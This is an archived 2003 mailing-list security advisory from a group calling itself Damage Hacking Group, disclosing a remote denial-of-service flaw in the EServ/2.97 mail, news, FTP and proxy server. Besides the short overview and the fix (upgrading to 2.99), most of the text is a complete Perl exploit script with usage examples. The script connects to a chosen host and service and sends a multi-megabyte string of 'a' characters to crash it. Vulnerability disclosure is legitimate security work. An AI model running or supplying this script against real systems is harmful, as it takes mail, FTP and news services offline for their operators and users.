#####################################################* # Damage Hacking Group security advisory # www.dhgroup.org #####################################################* #Product: EServ/2.97 #Authors: Etype Co. [www.eserv.ru] #Vulnerable versions: up to v.2.97, may be 2.98 #Not vulnerable versions: v.2.99 #Vulnerability: remote DoS #####################################################* #Overview#--------------------------------------------------------------# From EServ's 'readme' file: "Eserv/2.97 - mail, news, web, ftp and proxy server. It includes: - SMTP, POP3, NNTP -servers - caching HTTP/FTP proxy - HTTP server (maintaining virtual servers) - FTP server (with download and upload resuming support) - FTP-gate - Socks5, Socks4 and 4a proxy - TCP è UDP mapping proxy - Finger-server" #Problem#---------------------------------------------------------------# We founded 4 bugs, that allows to kill EServ by sending data with a very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b, NNTP - 5001216b. This is not buffer overflow, so it's impossible to use this bugs for privelege escalation or something like this. #Fix#--------------------------------------------------------------------# Download new verion from www.eserv.ru. EServ/2.99 _is_not_vulnerable_. #Exploit#----------------------------------------------------------------# #!/usr/bin/perl ###################################################### #EServ/2.97 remote DoS xsploit #Bugs founded in v.2.97 but I think that 2.98 is #vulnerable too. ################# #Usage: perl EServ.DoS.pl [host] [port] [service_type] #Where 'service_type' - service to attack (pop, smtp, ftp, nntp) #Example: perl EServ.DoS.pl localhost 110 pop ################# #If something wrong or u wanna to discuss something, #contact me: "D4rkGr3y" <grey_1999at_private> icq: 540981 ####################################################### use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; $param = $ARGV[2]; $data = "a"; print "\n\n";; print "#Product: EServ/2.97 - www.eserv.ru\n"; print "#Vuln: remote DoS\n"; print "#Xsploit by D4rkGr3y\n"; print "#Warning: if u use dial-up connection, attack can take a few time.\n\n"; if ($param) { $num = "4950001" if $param eq "pop"; $num = "4960000" if $param eq "smtp"; $num = "5005312" if $param eq "ftp"; $num = "5001215" if $param eq "nntp"; die "Error in params\n" if !$num; print "Connecting..."; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket error.\n"; print "OK\n"; $buf .= $data x $num; print "Attacking..."; print $socket "$buf\n"; print "OK\n\n"; print "Vizit us at www.dhgroup.org"; close($socket); } else { print "Error in Params.\n"; print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n"; print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n"; print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n"; exit; } #EOF Best regards www.dhgroup.org D4rkGr3y icq 540981
This archive was generated by hypermail 2b30 : Sat Jan 04 2003 - 18:38:14 PST